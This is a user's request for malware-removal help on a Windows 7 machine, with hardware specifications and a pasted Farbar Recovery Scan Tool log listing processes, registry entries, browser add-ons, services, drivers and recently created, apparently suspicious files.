Thank you for taking the time to help me. I really appreciate it.
I'm running a desktop computer with Windows 7 Ultimate Service pack 1 with the following specifications:
- MSI GeForce GTX 770 4GB TwinFrozr GAMING-series
- Intel Core i7 4770K 3.5 GHz (Haswell)
- ASUS Z87-A ATX
- A-Data 16GB (2x8GB) CL9 1600MHz XPG
- be quiet! Straight Power E9 680W 80+ Gold
- Samsung SSD Pro Basic 840-Series 256GB
- 2TB Seagate Barracuda 7200rpm 64MB
Here are the two FRST-logs, from running it in fail-safe mode:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (18-03-2018 09:05:41)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dinotify.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Install Spybot - Search & Destroy] => "G:\spybotsd-2.6.46.exe"
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Report] => C:\AdwCleaner\AdwCleaner[C1].tx
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {6c4e0517-4ea1-11e3-8ffc-74d02b96086c} - H:\LaunchU3.exe -a
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {d6896687-cb1f-11e3-a1c7-74d02b96086c} - H:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A14B04 PID_0083 {01D42BF0-ED08-463f-8A28-99EB6FEE962B}
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {ec015733-b07d-11e7-9a6f-74d02b96086c} - I:\HiSuiteDownLoader.exe
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)
FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-02]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-02]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [File not signed]
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S4 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
S2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
S2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S3 NvStreamNetworkSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe" [X]
S2 NvStreamSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe" [X]
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r
S2 WsDrvInst; C:\Program Files (x86)\Wondershare\dr.fone toolkit for Android\Library\DriverInstaller\DriverInstall.exe [X]
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
S3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
S1 prilock; C:\Windows\System32\drivers\prilock.sys [122776 2018-02-08] ()
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
S2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
S2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
S3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
S3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
S3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
S3 ALSysIO; \??\C:\Users\Martin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S1 gdgqdwdi; \??\C:\Windows\system32\drivers\gdgqdwdi.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2018-03-18 09:03 - 2018-03-18 09:05 - 000000000 ____D C:\FRST
2018-03-02 12:09 - 2018-03-02 12:09 - 000345720 _____ C:\Windows\Minidump\030218-7519-01.dmp
2018-03-02 11:13 - 2018-03-02 11:13 - 000406768 _____ C:\Windows\Minidump\030218-8314-01.dmp
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:22 - 2018-03-02 10:22 - 000407760 _____ C:\Windows\Minidump\030218-8564-01.dmp
2018-03-02 10:21 - 2018-03-02 11:15 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-02 10:27 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:33 - 2018-03-02 08:33 - 000272600 _____ C:\Windows\Minidump\030218-7675-01.dmp
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:12 - 2018-03-02 08:12 - 000404320 _____ C:\Windows\Minidump\030218-10608-01.dmp
2018-03-02 08:11 - 2018-03-02 11:15 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-02 07:45 - 2018-03-02 07:45 - 000272600 _____ C:\Windows\Minidump\030218-7129-01.dmp
2018-03-02 07:45 - 2018-03-02 07:45 - 000000000 ____D C:\Windows\LastGood
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:26 - 2018-03-02 12:09 - 590156355 _____ C:\Windows\MEMORY.DMP
2018-03-01 17:26 - 2018-03-01 17:26 - 000407952 _____ C:\Windows\Minidump\030118-7472-01.dmp
2018-03-01 17:14 - 2018-03-18 09:02 - 001178610 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Users\Martin\AppData\Roaming\LookUpPro
2018-03-01 17:09 - 2018-03-01 17:23 - 000000000 ____D C:\ProgramData\616ca8e3-9bd6-4a32-a4f3-3640822a6c06
2018-03-01 17:09 - 2018-03-01 17:09 - 000024450 _____ C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
2018-03-01 17:09 - 2018-03-01 17:09 - 000003060 _____ C:\Windows\System32\Tasks\OHurYzwpfZsLsh
2018-03-01 17:09 - 2018-03-01 17:09 - 000002872 _____ C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2
2018-03-01 17:09 - 2018-03-01 17:09 - 000002860 _____ C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2
2018-03-01 17:09 - 2018-03-01 17:09 - 000002850 _____ C:\Windows\System32\Tasks\wXkHuguozQzssiw2
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-02 08:02 - 000000000 ____D C:\Program Files\K3QPCMS68Z
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:23 - 000000000 ____D C:\Program Files (x86)\One
2018-03-01 17:08 - 2018-03-01 17:14 - 000000000 ____D C:\Users\Martin\AppData\Roaming\eiab2yplwq4
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ C:\Users\Martin\AppData\Local\installer.dat
2018-03-01 11:52 - 2018-03-01 11:52 - 000088024 _____ C:\Windows\system32\Drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys
2018-03-01 11:52 - 2018-03-01 11:52 - 000041224 _____ C:\Windows\uninstaller.dat
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
